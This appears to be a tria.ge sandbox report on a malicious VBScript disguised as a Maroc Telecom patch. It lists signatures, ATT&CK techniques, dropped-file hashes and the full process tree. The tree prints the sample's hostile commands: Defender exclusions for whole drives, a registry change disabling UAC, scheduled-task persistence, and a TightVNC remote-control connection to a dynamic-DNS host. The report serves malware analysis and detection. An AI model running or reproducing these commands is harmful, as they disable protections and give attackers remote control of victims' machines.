Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

13082024_1...om.vbs

windows7-x64

8

13082024_1...om.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/08/2024, 16:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    13082024_1650_patch_08_24_maroc_telecom.vbs

  • Size

    85KB

  • MD5

    256ff7496d004c17a81294e45341a696

  • SHA1

    45af0de886b8fc54cfd8acfd2b386a77bba63887

  • SHA256

    295ef3832bb6ef89c93c39b62542be9f490b74a082c2b06955aa3351c3005002

  • SHA512

    b430b6da57b6937c9468cebee49f655b50fa11e3ed57c0c584d50b0d677119f5db2d893a1bcde422e8087af6a92f7aee03d26e3b14e8a3f4ed3ae9221f4a3ac3

  • SSDEEP

    96:AF9Gmbz9Lz3a74Tbq2HY0UiAvSHLQV0gUiAvSHmnWLF:AF9GS9LzacThY0UiAvSrQV0gUiAvSxF

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies registry key 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13082024_1650_patch_08_24_maroc_telecom.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5116
    • C:\Users\Public\7g.exe
      "C:\Users\Public\7g.exe" e -p1625093 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\agent.7z"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:3368
    • C:\Users\Public\WindowsUpdate\agent.exe
      "C:\Users\Public\WindowsUpdate\agent.exe" lnrm5$+wu4j%=vogu
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -ex bypass -C "Add-MpPreference -ExclusionPath 'C:','d:','e:','f:','g:','h:', 'C:\Users\Public\WindowsUpdate\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1364
      • C:\Windows\SysWOW64\REG.exe
        "REG" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:4988
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks.exe" /create /f /tn WindowsUpdateTaskScheduler /XML "C:\Users\Public\WindowsUpdate\\Common\xml.xml"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1200
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /f /im securitysvc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4148
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /f /im netsvc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /f /im securitysvc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1224
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -remove -silent
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2284
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -install -silent
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4640
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -start
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
          "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -slave
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3468
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -connect albaridbank.freedynamicdns.org:65433
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3632
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F & taskkill /f /im "agent.exe" & del "C:\Users\Public\WindowsUpdate\agent.exe" & rmdir /s /q "C:\Users\Public\WindowsUpdate\Common"
        3⤵
        • Indicator Removal: Clear Persistence
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3076
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2832
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2156
        • C:\Windows\SysWOW64\schtasks.exe
          SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F
          4⤵
          • System Location Discovery: System Language Discovery
          PID:740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im "agent.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
  • C:\Users\Public\WindowsUpdate\agent.exe
    C:\Users\Public\WindowsUpdate\agent.exe lnrm5$+wu4j%=vogu
    1⤵
    • Executes dropped EXE
    PID:4376
  • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -service
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4352
    • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
      "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -desktopserver -logdir "C:\Windows\system32\config\systemprofile\AppData\Roaming\TightVNC" -loglevel 0 -shmemname Global\kyfcyfojrndplkfbnxxc
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

1
T1562

Disable or Modify Tools

1
T1562.001

Indicator Removal

1
T1070

Clear Persistence

1
T1070.009

Modify Registry

3
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onds3vt4.bzi.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Public\7g.exe
    Filesize

    577KB

    MD5

    11fa744ebf6a17d7dd3c58dc2603046d

    SHA1

    d99de792fd08db53bb552cd28f0080137274f897

    SHA256

    1b16c41ae39b679384b06f1492b587b650716430ff9c2e079dca2ad1f62c952d

    SHA512

    424196f2acf5b89807f4038683acc50e7604223fc630245af6bab0e0df923f8b1c49cb09ac709086568c214c3f53dcb7d6c32e8a54af222a3ff78cfab9c51670

    Download Submit

  • C:\Users\Public\WindowsUpdate\Common\SCREEN~1.DLL
    Filesize

    76KB

    MD5

    7bc5225db0c41ff9227295e666600312

    SHA1

    e78dcca63b0ef68fb3833ab1fe3bb13b066e7122

    SHA256

    528e99d415a5a743af6f8b68b1fe87b133a0a6bc22b48e33465c374a09e57703

    SHA512

    e4837f3fe5c8275d0a389b60b0303617da0d7b737e87cc5ca3190e338ff2bdeb1604fef20bd35b911c2e945198d46f7df5a91d8a3677b3381e9c449878a55a95

    Download Submit

  • C:\Users\Public\WindowsUpdate\Common\bundle
    Filesize

    1.9MB

    MD5

    f34aa5938ab898f964c4f50d49ddc05a

    SHA1

    56bc17db1ce446fbd25106903b14d8ef6f0d6975

    SHA256

    a6cd84730fa0ae73cc2298ea6d259656b34aff4e0f2c606b55982aafed7225d3

    SHA512

    409d6cb252829423a39ad85cb6824cb8f1e82392ba2769b4b0138d50644b39705e1097ee71a2d29f0790a78363f15219433027deecff676afa148df61623c106

    Download Submit

  • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    Filesize

    1.4MB

    MD5

    c0f2536aab89e866be517ada093d6ae9

    SHA1

    8025575cc5832876fc2fd0895816381c724b3480

    SHA256

    ce1758d559910b328d60d5aa4587ce3602471c3d6d5351b6162998d5f2251599

    SHA512

    9d4dd916f09dd0dffe175d059af23df9a115a78d3a34033c7562f95746e244d59c015ff52b682d07e4e0ff748b614471a077163422a39331630d27eaf013efb6

    Download Submit

  • C:\Users\Public\WindowsUpdate\Common\system.dat
    Filesize

    43B

    MD5

    11b00cd8aaf7e64945e1d3ae970e60d5

    SHA1

    685ee5e63e6daa1cd705c64a3d9381b253cffe5b

    SHA256

    c9f745531f4786534342775b8d630139fbab20c921a01774a79844137e1d4cdc

    SHA512

    d33a2a35cdd04d2cfe9c0bc9df1c9ebc3c2ded04382aefd69fcd3693919b6f3c5206954bcf22d05560a6ce43374c13db1d0d251d0ad55fb9bbed87f5364569cf

    Download Submit

  • C:\Users\Public\WindowsUpdate\Common\xml.xml
    Filesize

    1KB

    MD5

    a3ffc26af4bc23881333c6168ac582cf

    SHA1

    efabc9e281eef3f8889743f9a0a384c6bc44e694

    SHA256

    6cb41ae787d7b9c1db2a65cb95672ad78fd1ae814d581d9bb9b493da4c13859c

    SHA512

    aa7cea924c5c720e7fb9df4655ca821acbfeecb54cb3f92a2037d1591be3ce47a3e862103656683e2d050a951c30b5fa3d78e3e682184d1661cc178524467fa5

    Download Submit

  • C:\Users\Public\WindowsUpdate\agent.exe
    Filesize

    3.5MB

    MD5

    231b19fcd10a574335b4bdc87bcb4ae4

    SHA1

    f0adb64152558db2578b2bea362728d1bec25cde

    SHA256

    eb09ee350a19054ce5ada302bb4a1586795e713745a16fd7bf3ec70096f47461

    SHA512

    79eeb89e35e1035a8245a69a6f66dca3bb74ce498fef9cf69004483b45f69c1a2e0c9481b3de70881cb6d041f110b67363a085e0b7e44117554ea2c22fff9ed6

    Download Submit

  • C:\Users\Public\agent.7z
    Filesize

    2.6MB

    MD5

    ae5b78797fdf5f862f979faf5862db72

    SHA1

    753df8bdb95e4a7e526ea32fa54e9a4ab0c714c1

    SHA256

    dd467e0657fd6c0e1ee571cfa05aac81b147ac8a7289ea8499c2162f7be12a97

    SHA512

    2670bf113bcece56e167d78f300d0f2da6481a1fa7415d08174e00f6723bf446fdecff2e88a7010d71d987b087ba683df5a23fed8e2e01f7f9dc1f3bd8fb7a80

    Download Submit

  • memory/1364-79-0x0000000006780000-0x000000000679E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1364-99-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/1364-52-0x00000000031A0000-0x00000000031D6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1364-65-0x00000000058D0000-0x00000000058F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1364-66-0x00000000059F0000-0x0000000005A56000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1364-67-0x0000000006140000-0x00000000061A6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1364-77-0x00000000062B0000-0x0000000006604000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1364-102-0x0000000007D30000-0x0000000007D38000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1364-101-0x0000000007E00000-0x0000000007E1A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1364-80-0x00000000067D0000-0x000000000681C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1364-81-0x0000000006D60000-0x0000000006D92000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1364-82-0x0000000071BA0000-0x0000000071BEC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1364-92-0x0000000007960000-0x000000000797E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1364-93-0x0000000007980000-0x0000000007A23000-memory.dmp

    Filesize

    652KB

    Download

  • memory/1364-94-0x00000000080F0000-0x000000000876A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1364-95-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1364-96-0x0000000007B10000-0x0000000007B1A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1364-97-0x0000000007D40000-0x0000000007DD6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1364-98-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/1364-57-0x0000000005AA0000-0x00000000060C8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1364-100-0x0000000007CF0000-0x0000000007D04000-memory.dmp

    Filesize

    80KB

    Download

  • memory/5116-0-0x00007FFD665A3000-0x00007FFD665A5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5116-15-0x00007FFD665A0000-0x00007FFD67061000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5116-12-0x00007FFD665A0000-0x00007FFD67061000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5116-11-0x00007FFD665A0000-0x00007FFD67061000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5116-1-0x000001F754AE0000-0x000001F754B02000-memory.dmp

    Filesize

    136KB

    Download